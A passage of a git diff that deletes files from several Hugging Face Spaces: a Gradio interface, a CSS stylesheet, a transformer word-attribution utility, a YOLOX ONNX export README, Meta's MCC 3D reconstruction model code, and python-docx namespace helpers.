" -iface = gr.Interface( - do_inference, - im, - outputs = [ gr.outputs.Label(num_top_classes=5), gr.outputs.Image(label='Output image', type='pil')], - live=False, - interpretation=None, - title=title, - description=description, - examples=examples -) - -#iface.test_launch() - -iface.launch() \ No newline at end of file diff --git a/spaces/celise88/Pathfinder/static/styles.css b/spaces/celise88/Pathfinder/static/styles.css deleted file mode 100644 index e6948baf02c014460f1dcc298a40a6e3da3d99ba..0000000000000000000000000000000000000000 --- a/spaces/celise88/Pathfinder/static/styles.css +++ /dev/null @@ -1,284 +0,0 @@ -html { - font-family: Lato, sans-serif; -} - -*, *::after, *::before { - box-sizing: inherit; -} - -.body { - box-sizing: border-box; - margin: 0; -} - -.navbar { - max-width: 1000px; - margin: 50px auto; - padding: 0 20px; - display: flex; - flex-direction: row; - justify-content: space-between; - font-size: 20px; -} - -.navbar__brand { - display: flex; - align-items: center; - color: #2c2161; -} - -.navbar__logo { - text-decoration: none; - color: #2c2161; -} - -.navbar__navigation { - display: flex; - flex-direction: row; - list-style: none; - padding: 0; - align-items: center; - color: #5c6b70 -} - -.navbar__navigation-item { - margin-left: 30px; -} - -.navbar__link { - color: inherit; - text-decoration: none; -} - -.main { - max-width: 600px; - margin: 0 auto; - padding: 0 20px; -} - -.pagetitle { - font-size: 39px; - font-weight: bold; - margin-bottom: 20px; - margin-top: 50px; - background-color: #3cd0ff; - border: none; - border-radius: 20px; - padding: 5px; - color: white; - text-align:center; -} - -.pagesubtitle { - font-size: 30px; - font-weight: bold; - margin-bottom: 75px; - margin-top: 75px; - color: #2c2161; - text-align:center -} - -.form__input { - display: flex; - flex-direction: column; - margin-top: 50px; - align-items: flex-start; -} - -.form__label { - display: flex; - margin-bottom: 30px; - font-size: 16px; - font-weight: bold; - color: #2c2161; - text-align:center; -} - -.form__dropdown { - display: block; - max-height: fit-content; - margin-bottom: 10px; - font-size: 14px; - align-self: center; - text-align:center; -} - -.form__submit { - background-color: #3cd0ff; - border: none; - max-width: fit-content; - font-size: 16px; - font-weight: bold; - padding: 5px 30px; - border-radius: 20px; - color: white; - cursor: pointer; - text-align:center; - } - -.radio__submit { - margin: auto; - background-color: #3cd0ff; - border: none; - max-width: fit-content; - font-size: 16px; - font-weight: bold; - padding: 5px 30px; - border-radius: 20px; - color: white; - cursor: pointer; - } - -.upload { - max-width: fit-content; - display: flex; - flex-direction: column; - - margin-bottom: 50px; -} - -.upload__file { - font-size: 14px; - text-align:center; - margin-top: 50px; - margin-bottom: 20px; - color: #2c2161; - cursor: pointer; -} - -.sectiontitle { - font-size: 24px; - font-weight: bold; - margin-bottom: 20px; - margin-top: 70px; - color: #2c2161; -} - -.sectiontext { - font-size: 18px; - color: #2c2161; - margin-bottom: 50px; -} - -.message { - font-size: 24px; - font-weight: bold; - margin-bottom: 200px; - margin-top: 200px; - margin-left: 50px; - color: #2c2161; -} - -.alert { - font-size: 14px; - color: #2c2161; - margin-bottom: 30px; - text-align:left; -} - -.sectionlist { - margin-bottom: 30px; -} - -.sectionlist__item { - font-size: 16px; - color: #2c2161; - margin-bottom: 10px; -} - -.output__section { - display: flex; - flex-direction: column; - justify-content: center; - align-items: center; - margin-bottom: 50px; -} - -.output__subtitle { - font-size: 30px; - font-weight: bold; - margin-bottom: 30px; - color: #2c2161; - text-align:center -} - -.output__list { - text-align: center; - margin-bottom: 50px; -} - -.output__list-item { - font-size: 14px; - color: #2c2161; - margin-bottom: 10px; - margin-right: 10px; -} - -.output__list-coloreditem { - font-size: 14px; - color: #3cd0ff; - margin-bottom: 10px; - margin-right: 10px; - font-weight: bold; -} - -.selection__form { - display: table-row-group; - vertical-align: left; - align-content: left; -} - -.form__login { - display: flex; - flex-direction: column; - justify-content: center; - align-items: center; -} - -.form__login-label { - font-size: 14px; - color: #2c2161; - text-align: center; -} - -.output__table-item { - font-size: 14px; - color: #2c2161; - text-align: left; - align-self: flex-start; -} - -.footer { - background-color: #323f43; - padding: 40px 0; - border-top: 4px solid black; - display: flex; - flex-direction: row; - justify-content: space-between; -} - -.footer__text { - display: flex; - flex-direction: row; - list-style: none; - padding: 0; - color: white; - font-size: 12px; -} - -.footer__text-item { - margin-left: 50px; - color: inherit; - text-decoration: none; - font-size: inherit; -} - -.footer__text-link { - color: inherit; - font-size: inherit; -} - -.footer__text-link:hover { - text-decoration: underline; - color: inherit; -} \ No newline at end of file diff --git a/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py b/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py deleted file mode 100644 index d26385ce27b8a30111b0ae44101e8eb1201e7f39..0000000000000000000000000000000000000000 --- a/spaces/cffl/Exploring_Intelligent_Writing_Assistance/src/transformer_interpretability.py +++ /dev/null @@ -1,148 +0,0 @@ -# ########################################################################### -# -# CLOUDERA APPLIED MACHINE LEARNING PROTOTYPE (AMP) -# (C) Cloudera, Inc. 2022 -# All rights reserved. -# -# Applicable Open Source License: Apache 2.0 -# -# NOTE: Cloudera open source products are modular software products -# made up of hundreds of individual components, each of which was -# individually copyrighted. Each Cloudera open source product is a -# collective work under U.S. Copyright Law. Your license to use the -# collective work is as provided in your written agreement with -# Cloudera. Used apart from the collective work, this file is -# licensed for your use pursuant to the open source license -# identified above. -# -# This code is provided to you pursuant a written agreement with -# (i) Cloudera, Inc. or (ii) a third-party authorized to distribute -# this code. If you do not have a written agreement with Cloudera nor -# with an authorized and properly licensed third party, you do not -# have any rights to access nor to use this code. -# -# Absent a written agreement with Cloudera, Inc. (“Cloudera”) to the -# contrary, A) CLOUDERA PROVIDES THIS CODE TO YOU WITHOUT WARRANTIES OF ANY -# KIND; (B) CLOUDERA DISCLAIMS ANY AND ALL EXPRESS AND IMPLIED -# WARRANTIES WITH RESPECT TO THIS CODE, INCLUDING BUT NOT LIMITED TO -# IMPLIED WARRANTIES OF TITLE, NON-INFRINGEMENT, MERCHANTABILITY AND -# FITNESS FOR A PARTICULAR PURPOSE; (C) CLOUDERA IS NOT LIABLE TO YOU, -# AND WILL NOT DEFEND, INDEMNIFY, NOR HOLD YOU HARMLESS FOR ANY CLAIMS -# ARISING FROM OR RELATED TO THE CODE; AND (D)WITH RESPECT TO YOUR EXERCISE -# OF ANY RIGHTS GRANTED TO YOU FOR THE CODE, CLOUDERA IS NOT LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, PUNITIVE OR -# CONSEQUENTIAL DAMAGES INCLUDING, BUT NOT LIMITED TO, DAMAGES -# RELATED TO LOST REVENUE, LOST PROFITS, LOSS OF INCOME, LOSS OF -# BUSINESS ADVANTAGE OR UNAVAILABILITY, OR LOSS OR CORRUPTION OF -# DATA. -# -# ########################################################################### - -import torch -from transformers_interpret import SequenceClassificationExplainer -from transformers import ( - AutoTokenizer, - AutoModelForSequenceClassification, -) - -from apps.visualization_utils import visualize_text - -class CustomSequenceClassificationExplainer(SequenceClassificationExplainer): - """ - Subclassing to replace `visualize()` method with custom styling. - - Namely, removing a few columns, styling fonts, and re-arrangning legend position. - """ - - def visualize(self, html_filepath: str = None, true_class: str = None): - """ - Visualizes word attributions. If in a notebook table will be displayed inline. - Otherwise pass a valid path to `html_filepath` and the visualization will be saved - as a html file. - If the true class is known for the text that can be passed to `true_class` - """ - tokens = [token.replace("Ġ", "") for token in self.decode(self.input_ids)] - attr_class = self.id2label[self.selected_index] - - if self._single_node_output: - if true_class is None: - true_class = round(float(self.pred_probs)) - predicted_class = round(float(self.pred_probs)) - attr_class = round(float(self.pred_probs)) - else: - if true_class is None: - true_class = self.selected_index - predicted_class = self.predicted_class_name - - score_viz = self.attributions.visualize_attributions( # type: ignore - self.pred_probs, - predicted_class, - true_class, - attr_class, - tokens, - ) - - # NOTE: here is the overwritten function - html = visualize_text([score_viz]) - - if html_filepath: - if not html_filepath.endswith(".html"): - html_filepath = html_filepath + ".html" - with open(html_filepath, "w") as html_file: - html_file.write(html.data) - - return html - - -class InterpretTransformer: - """ - Utility for visualizing word attribution scores from Transformer models. - - This class utilizes the [Transformers Interpret](https://github.com/cdpierse/transformers-interpret) - libary to calculate word attributions using a techinique called Integrated Gradients. - - Attributes: - cls_model_identifier (str) - - """ - - def __init__(self, cls_model_identifier: str): - - self.cls_model_identifier = cls_model_identifier - self.device = ( - torch.cuda.current_device() if torch.cuda.is_available() else "cpu" - ) - - self._initialize_hf_artifacts() - - def _initialize_hf_artifacts(self): - """ - Initialize a HuggingFace artifacts (tokenizer and model) according - to the provided identifiers for both SBert and the classification model. - Then initialize the word attribution explainer with the HF model+tokenizer. - - """ - - # classifer - self.cls_tokenizer = AutoTokenizer.from_pretrained(self.cls_model_identifier) - self.cls_model = AutoModelForSequenceClassification.from_pretrained( - self.cls_model_identifier - ) - self.cls_model.to(self.device) - - # transformers interpret - self.explainer = CustomSequenceClassificationExplainer( - self.cls_model, self.cls_tokenizer - ) - - def visualize_feature_attribution_scores(self, text: str, class_index: int = 0): - """ - Calculates and visualizes feature attributions using integrated gradients. - - Args: - text (str) - text to get attributions for - class_index (int) - Optional output index to provide attributions for - - """ - self.explainer(text, index=class_index) - return self.explainer.visualize() diff --git a/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md b/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md deleted file mode 100644 index 6af0944a6b3a984045daf2d4215f96290ed5e9af..0000000000000000000000000000000000000000 --- a/spaces/chendl/compositional_test/multimodal/YOLOX/demo/ONNXRuntime/README.md +++ /dev/null @@ -1,78 +0,0 @@ -## YOLOX-ONNXRuntime in Python - -This doc introduces how to convert your pytorch model into onnx, and how to run an onnxruntime demo to verify your convertion. - -### Step1: Install onnxruntime - -run the following command to install onnxruntime: -```shell -pip install onnxruntime -``` - -### Step2: Get ONNX models - -Users might download our pre-generated ONNX models or convert their own models to ONNX. - -#### Download ONNX models. - -| Model | Parameters | GFLOPs | Test Size | mAP | Weights | -|:------| :----: | :----: | :---: | :---: | :---: | -| YOLOX-Nano | 0.91M | 1.08 | 416x416 | 25.8 |[github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_nano.onnx) | -| YOLOX-Tiny | 5.06M | 6.45 | 416x416 |32.8 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_tiny.onnx) | -| YOLOX-S | 9.0M | 26.8 | 640x640 |40.5 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_s.onnx) | -| YOLOX-M | 25.3M | 73.8 | 640x640 |47.2 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_m.onnx) | -| YOLOX-L | 54.2M | 155.6 | 640x640 |50.1 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_l.onnx) | -| YOLOX-Darknet53| 63.72M | 185.3 | 640x640 |48.0 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_darknet.onnx) | -| YOLOX-X | 99.1M | 281.9 | 640x640 |51.5 | [github](https://github.com/Megvii-BaseDetection/YOLOX/releases/download/0.1.1rc0/yolox_x.onnx) | - -#### Convert Your Model to ONNX - -First, you should move to by: -```shell -cd -``` -Then, you can: - -1. Convert a standard YOLOX model by -n: -```shell -python3 tools/export_onnx.py --output-name yolox_s.onnx -n yolox-s -c yolox_s.pth -``` -Notes: -* -n: specify a model name. The model name must be one of the [yolox-s,m,l,x and yolox-nano, yolox-tiny, yolov3] -* -c: the model you have trained -* -o: opset version, default 11. **However, if you will further convert your onnx model to [OpenVINO](https://github.com/Megvii-BaseDetection/YOLOX/demo/OpenVINO/), please specify the opset version to 10.** -* --no-onnxsim: disable onnxsim -* To customize an input shape for onnx model, modify the following code in tools/export.py: - - ```python - dummy_input = torch.randn(1, 3, exp.test_size[0], exp.test_size[1]) - ``` - -1. Convert a standard YOLOX model by -f. When using -f, the above command is equivalent to: - -```shell -python3 tools/export_onnx.py --output-name yolox_s.onnx -f exps/default/yolox_s.py -c yolox_s.pth -``` - -3. To convert your customized model, please use -f: - -```shell -python3 tools/export_onnx.py --output-name your_yolox.onnx -f exps/your_dir/your_yolox.py -c your_yolox.pth -``` - -### Step3: ONNXRuntime Demo - -Step1. -```shell -cd /demo/ONNXRuntime -``` - -Step2. -```shell -python3 onnx_inference.py -m -i -o -s 0.3 --input_shape 640,640 -``` -Notes: -* -m: your converted onnx model -* -i: input_image -* -s: score threshold for visualization. -* --input_shape: should be consistent with the shape you used for onnx convertion. diff --git a/spaces/chongjie/MCC_slim/mcc_model.py b/spaces/chongjie/MCC_slim/mcc_model.py deleted file mode 100644 index 9980a8c941042062208ca7ea0175601acd72a3ae..0000000000000000000000000000000000000000 --- a/spaces/chongjie/MCC_slim/mcc_model.py +++ /dev/null @@ -1,386 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. -# -------------------------------------------------------- -# References: -# timm: https://github.com/rwightman/pytorch-image-models/tree/master/timm -# DeiT: https://github.com/facebookresearch/deit -# MAE: https://github.com/facebookresearch/mae -# -------------------------------------------------------- - -from functools import partial - -import torch -import torch.nn as nn -import torch.nn.functional as F - -from timm.models.vision_transformer import PatchEmbed, Block, Mlp, DropPath - -from util.pos_embed import get_2d_sincos_pos_embed - -class MCCDecoderAttention(nn.Module): - def __init__(self, dim, num_heads=8, qkv_bias=False, attn_drop=0., proj_drop=0., args=None): - super().__init__() - assert dim % num_heads == 0, 'dim should be divisible by num_heads' - self.num_heads = num_heads - head_dim = dim // num_heads - self.scale = head_dim ** -0.5 - - self.args = args - self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop) - self.proj = nn.Linear(dim, dim) - self.proj_drop = nn.Dropout(proj_drop) - - def forward(self, x, unseen_size): - B, N, C = x.shape - qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4) - q, k, v = qkv.unbind(0) - attn = (q @ k.transpose(-2, -1)) * self.scale - - mask = torch.zeros((1, 1, N, N), device=attn.device) - mask[:, :, :, -unseen_size:] = float('-inf') - for i in range(unseen_size): - mask[:, :, -(i + 1), -(i + 1)] = 0 - attn = attn + mask - attn = attn.softmax(dim=-1) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - -class MCCDecoderBlock(nn.Module): - - def __init__( - self, dim, num_heads, mlp_ratio=4., qkv_bias=False, drop=0., attn_drop=0., init_values=None, - drop_path=0., act_layer=nn.GELU, norm_layer=nn.LayerNorm, args=None): - super().__init__() - self.args = args - self.norm1 = norm_layer(dim) - self.attn = MCCDecoderAttention(dim, num_heads=num_heads, qkv_bias=qkv_bias, attn_drop=attn_drop, proj_drop=drop, args=args) - self.ls1 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity() - self.drop_path1 = DropPath(drop_path) if drop_path > 0. else nn.Identity() - - self.norm2 = norm_layer(dim) - mlp_hidden_dim = int(dim * mlp_ratio) - self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop) - self.ls2 = LayerScale(dim, init_values=init_values) if init_values else nn.Identity() - self.drop_path2 = DropPath(drop_path) if drop_path > 0. else nn.Identity() - - def forward(self, x, unseen_size): - x = x + self.drop_path1(self.ls1(self.attn(self.norm1(x), unseen_size))) - x = x + self.drop_path2(self.ls2(self.mlp(self.norm2(x)))) - return x - - -class XYZPosEmbed(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, embed_dim): - super().__init__() - self.embed_dim = embed_dim - - self.two_d_pos_embed = nn.Parameter( - torch.zeros(1, 64 + 1, embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.win_size = 8 - - self.pos_embed = nn.Linear(3, embed_dim) - - self.blocks = nn.ModuleList([ - Block(embed_dim, num_heads=12, mlp_ratio=2.0, qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6)) - for _ in range(1) - ]) - - self.invalid_xyz_token = nn.Parameter(torch.zeros(embed_dim,)) - - self.initialize_weights() - - def initialize_weights(self): - torch.nn.init.normal_(self.cls_token, std=.02) - - two_d_pos_embed = get_2d_sincos_pos_embed(self.two_d_pos_embed.shape[-1], 8, cls_token=True) - self.two_d_pos_embed.data.copy_(torch.from_numpy(two_d_pos_embed).float().unsqueeze(0)) - - torch.nn.init.normal_(self.invalid_xyz_token, std=.02) - - def forward(self, seen_xyz, valid_seen_xyz): - emb = self.pos_embed(seen_xyz) - - emb[~valid_seen_xyz] = 0.0 - emb[~valid_seen_xyz] += self.invalid_xyz_token - - B, H, W, C = emb.shape - emb = emb.view(B, H // self.win_size, self.win_size, W // self.win_size, self.win_size, C) - emb = emb.permute(0, 1, 3, 2, 4, 5).contiguous().view(-1, self.win_size * self.win_size, C) - - emb = emb + self.two_d_pos_embed[:, 1:, :] - cls_token = self.cls_token + self.two_d_pos_embed[:, :1, :] - - cls_tokens = cls_token.expand(emb.shape[0], -1, -1) - emb = torch.cat((cls_tokens, emb), dim=1) - for _, blk in enumerate(self.blocks): - emb = blk(emb) - return emb[:, 0].view(B, (H // self.win_size) * (W // self.win_size), -1) - - -class DecodeXYZPosEmbed(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, embed_dim): - super().__init__() - self.embed_dim = embed_dim - self.pos_embed = nn.Linear(3, embed_dim) - - def forward(self, unseen_xyz): - return self.pos_embed(unseen_xyz) - - -class MCC(nn.Module): - """ Masked Autoencoder with VisionTransformer backbone - """ - def __init__(self, - img_size=224, patch_size=16, in_chans=3, - embed_dim=1024, depth=24, num_heads=16, - decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16, - mlp_ratio=4., norm_layer=nn.LayerNorm, - rgb_weight=1.0, occupancy_weight=1.0, args=None): - super().__init__() - - self.rgb_weight = rgb_weight - self.occupancy_weight = occupancy_weight - self.args = args - - # -------------------------------------------------------------------------- - # encoder specifics - self.patch_embed = PatchEmbed(img_size, patch_size, in_chans, embed_dim) - num_patches = self.patch_embed.num_patches - - self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.cls_token_xyz = nn.Parameter(torch.zeros(1, 1, embed_dim)) - self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.xyz_pos_embed = XYZPosEmbed(embed_dim) - - self.blocks = nn.ModuleList([ - Block( - embed_dim, num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path - ) for i in range(depth)]) - - self.blocks_xyz = nn.ModuleList([ - Block( - embed_dim, num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path - ) for i in range(depth)]) - - self.norm = norm_layer(embed_dim) - self.norm_xyz = norm_layer(embed_dim) - self.cached_enc_feat = None - - # -------------------------------------------------------------------------- - # decoder specifics - self.decoder_embed = nn.Linear( - embed_dim * 2, - decoder_embed_dim, - bias=True - ) - - self.decoder_xyz_pos_embed = DecodeXYZPosEmbed(decoder_embed_dim) - self.decoder_pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, decoder_embed_dim), requires_grad=False) # fixed sin-cos embedding - - self.decoder_blocks = nn.ModuleList([ - MCCDecoderBlock( - decoder_embed_dim, decoder_num_heads, mlp_ratio, qkv_bias=True, norm_layer=norm_layer, - drop_path=args.drop_path, - args=args, - ) for i in range(decoder_depth)]) - - self.decoder_norm = norm_layer(decoder_embed_dim) - if self.args.regress_color: - self.decoder_pred = nn.Linear(decoder_embed_dim, 3 + 1, bias=True) # decoder to patch - else: - self.decoder_pred = nn.Linear(decoder_embed_dim, 256 * 3 + 1, bias=True) # decoder to patch - - self.loss_occupy = nn.BCEWithLogitsLoss() - if self.args.regress_color: - self.loss_rgb = nn.MSELoss() - else: - self.loss_rgb = nn.CrossEntropyLoss() - - self.initialize_weights() - - def initialize_weights(self): - - pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.patch_embed.num_patches**.5), cls_token=True) - self.pos_embed.data.copy_(torch.from_numpy(pos_embed).float().unsqueeze(0)) - - decoder_pos_embed = get_2d_sincos_pos_embed(self.decoder_pos_embed.shape[-1], int(self.patch_embed.num_patches**.5), cls_token=True) - self.decoder_pos_embed.data.copy_(torch.from_numpy(decoder_pos_embed).float().unsqueeze(0)) - - # initialize patch_embed like nn.Linear (instead of nn.Conv2d) - w = self.patch_embed.proj.weight.data - torch.nn.init.xavier_uniform_(w.view([w.shape[0], -1])) - - # timm's trunc_normal_(std=.02) is effectively normal_(std=0.02) as cutoff is too big (2.) - torch.nn.init.normal_(self.cls_token, std=.02) - torch.nn.init.normal_(self.cls_token_xyz, std=.02) - - # initialize nn.Linear and nn.LayerNorm - self.apply(self._init_weights) - - def _init_weights(self, m): - if isinstance(m, nn.Linear): - # we use xavier_uniform following official JAX ViT: - torch.nn.init.xavier_uniform_(m.weight) - if isinstance(m, nn.Linear) and m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.LayerNorm): - nn.init.constant_(m.bias, 0) - nn.init.constant_(m.weight, 1.0) - - - def forward_encoder(self, x, seen_xyz, valid_seen_xyz): - - # get tokens - x = self.patch_embed(x) - x = x + self.pos_embed[:, 1:, :] - y = self.xyz_pos_embed(seen_xyz, valid_seen_xyz) - - ##### forward E_XYZ ##### - # append cls token - cls_token_xyz = self.cls_token_xyz - cls_tokens_xyz = cls_token_xyz.expand(y.shape[0], -1, -1) - - y = torch.cat((cls_tokens_xyz, y), dim=1) - # apply Transformer blocks - for blk in self.blocks_xyz: - y = blk(y) - y = self.norm_xyz(y) - - ##### forward E_RGB ##### - # append cls token - cls_token = self.cls_token + self.pos_embed[:, :1, :] - cls_tokens = cls_token.expand(x.shape[0], -1, -1) - - x = torch.cat((cls_tokens, x), dim=1) - # apply Transformer blocks - for blk in self.blocks: - x = blk(x) - x = self.norm(x) - - # combine encodings - x = torch.cat([x, y], dim=2) - return x - - def forward_decoder(self, x, unseen_xyz): - # embed tokens - x = self.decoder_embed(x) - x = x + self.decoder_pos_embed - - # 3D pos embed - unseen_xyz = self.decoder_xyz_pos_embed(unseen_xyz) - x = torch.cat([x, unseen_xyz], dim=1) - - # apply Transformer blocks - for blk in self.decoder_blocks: - x = blk(x, unseen_xyz.shape[1]) - - x = self.decoder_norm(x) - - # predictor projection - pred = self.decoder_pred(x) - # remove cls & seen token - pred = pred[:, -unseen_xyz.shape[1]:, :] - - return pred - - def forward_loss(self, pred, unseen_occupy, unseen_rgb): - loss = self.loss_occupy( - pred[:, :, :1].reshape((-1, 1)), - unseen_occupy.reshape((-1, 1)).float() - ) * self.occupancy_weight - - if unseen_occupy.sum() > 0: - if self.args.regress_color: - pred_rgb = pred[:, :, 1:][unseen_occupy.bool()] - gt_rgb = unseen_rgb[unseen_occupy.bool()] - else: - pred_rgb = pred[:, :, 1:][unseen_occupy.bool()].reshape((-1, 256)) - gt_rgb = torch.round(unseen_rgb[unseen_occupy.bool()] * 255).long().reshape((-1,)) - - rgb_loss = self.loss_rgb(pred_rgb, gt_rgb) * self.rgb_weight - loss = loss + rgb_loss - return loss - - - def clear_cache(self): - self.cached_enc_feat = None - - def forward(self, seen_images, seen_xyz, unseen_xyz, unseen_rgb, unseen_occupy, valid_seen_xyz, - cache_enc=False): - - unseen_xyz = shrink_points_beyond_threshold(unseen_xyz, self.args.shrink_threshold) - - if self.cached_enc_feat is None: - seen_images = preprocess_img(seen_images) - seen_xyz = shrink_points_beyond_threshold(seen_xyz, self.args.shrink_threshold) - latent = self.forward_encoder(seen_images, seen_xyz, valid_seen_xyz) - - if cache_enc: - if self.cached_enc_feat is None: - self.cached_enc_feat = latent - else: - latent = self.cached_enc_feat - - pred = self.forward_decoder(latent, unseen_xyz) - loss = self.forward_loss(pred, unseen_occupy, unseen_rgb) - return loss, pred - - -def get_mcc_model(**kwargs): - return MCC( - embed_dim=768, depth=12, num_heads=12, - decoder_embed_dim=512, decoder_depth=8, decoder_num_heads=16, - mlp_ratio=4, norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs - ) - - -def shrink_points_beyond_threshold(xyz, threshold): - xyz = xyz.clone().detach() - dist = (xyz ** 2.0).sum(axis=-1) ** 0.5 - affected = (dist > threshold) * torch.isfinite(dist) - xyz[affected] = xyz[affected] * ( - threshold * (2.0 - threshold / dist[affected]) / dist[affected] - )[..., None] - return xyz - - -def preprocess_img(x): - if x.shape[2] != 224: - assert x.shape[2] == 800 - x = F.interpolate( - x, - scale_factor=224./800., - mode="bilinear", - ) - resnet_mean = torch.tensor([0.485, 0.456, 0.406], device=x.device).reshape((1, 3, 1, 1)) - resnet_std = torch.tensor([0.229, 0.224, 0.225], device=x.device).reshape((1, 3, 1, 1)) - imgs_normed = (x - resnet_mean) / resnet_std - return imgs_normed - - -class LayerScale(nn.Module): - def __init__(self, dim, init_values=1e-5, inplace=False): - super().__init__() - self.inplace = inplace - self.gamma = nn.Parameter(init_values * torch.ones(dim)) - - def forward(self, x): - return x.mul_(self.gamma) if self.inplace else x * self.gamma diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py deleted file mode 100644 index fe33fcef1e18d2a4b92287e434cf6b1257e4274f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/contourpy/util/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from __future__ import annotations - -from contourpy.util._build_config import build_config - -__all__ = ["build_config"] diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py deleted file mode 100644 index 6b0861284f1f31971b95beb8660a7b19be6d10cc..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/oxml/ns.py +++ /dev/null @@ -1,114 +0,0 @@ -# encoding: utf-8 - -""" -Namespace-related objects. -""" - -from __future__ import absolute_import, print_function, unicode_literals - - -nsmap = { - "a": "http://schemas.openxmlformats.org/drawingml/2006/main", - "c": "http://schemas.openxmlformats.org/drawingml/2006/chart", - "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties", - "dc": "http://purl.org/dc/elements/1.1/", - "dcmitype": "http://purl.org/dc/dcmitype/", - "dcterms": "http://purl.org/dc/terms/", - "dgm": "http://schemas.openxmlformats.org/drawingml/2006/diagram", - "m": "http://schemas.openxmlformats.org/officeDocument/2006/math", - "pic": "http://schemas.openxmlformats.org/drawingml/2006/picture", - "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships", - "sl": "http://schemas.openxmlformats.org/schemaLibrary/2006/main", - "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main", - 'w14': "http://schemas.microsoft.com/office/word/2010/wordml", - "wp": "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing", - "xml": "http://www.w3.org/XML/1998/namespace", - "xsi": "http://www.w3.org/2001/XMLSchema-instance", -} - -pfxmap = dict((value, key) for key, value in nsmap.items()) - - -class NamespacePrefixedTag(str): - """ - Value object that knows the semantics of an XML tag having a namespace - prefix. - """ - def __new__(cls, nstag, *args): - return super(NamespacePrefixedTag, cls).__new__(cls, nstag) - - def __init__(self, nstag): - self._pfx, self._local_part = nstag.split(':') - self._ns_uri = nsmap[self._pfx] - - @property - def clark_name(self): - return '{%s}%s' % (self._ns_uri, self._local_part) - - @classmethod - def from_clark_name(cls, clark_name): - nsuri, local_name = clark_name[1:].split('}') - nstag = '%s:%s' % (pfxmap[nsuri], local_name) - return cls(nstag) - - @property - def local_part(self): - """ - Return the local part of the tag as a string. E.g. 'foobar' is - returned for tag 'f:foobar'. - """ - return self._local_part - - @property - def nsmap(self): - """ - Return a dict having a single member, mapping the namespace prefix of - this tag to it's namespace name (e.g. {'f': 'http://foo/bar'}). This - is handy for passing to xpath calls and other uses. - """ - return {self._pfx: self._ns_uri} - - @property - def nspfx(self): - """ - Return the string namespace prefix for the tag, e.g. 'f' is returned - for tag 'f:foobar'. - """ - return self._pfx - - @property - def nsuri(self): - """ - Return the namespace URI for the tag, e.g. 'http://foo/bar' would be - returned for tag 'f:foobar' if the 'f' prefix maps to - 'http://foo/bar' in nsmap. - """ - return self._ns_uri - - -def nsdecls(*prefixes): - """ - Return a string containing a namespace declaration for each of the - namespace prefix strings, e.g. 'p', 'ct', passed as *prefixes*. - """ - return ' '.join(['xmlns:%s="%s"' % (pfx, nsmap[pfx]) for pfx in prefixes]) - - -def nspfxmap(*nspfxs): - """ - Return a dict containing the subset namespace prefix mappings specified by - *nspfxs*. Any number of namespace prefixes can be supplied, e.g. - namespaces('a', 'r', 'p'). - """ - return dict((pfx, nsmap[pfx]) for pfx in nspfxs) - - -def qn(tag): - """ - Stands for "qualified name", a utility function to turn a namespace - prefixed tag name into a Clark-notation qualified tag name for lxml. For - example, ``qn('p:cSld')`` returns ``'{http://schemas.../main}cSld'``. - """ - prefix, tagroot = tag.split(':') - uri = nsmap[prefix] - return '{%s}%s' % (uri, tagroot) diff --git a/spaces/chuanenlin/pdf2preview/README.md b/spaces/chuanenlin/pdf2preview/README.md deleted file mode 100644 index 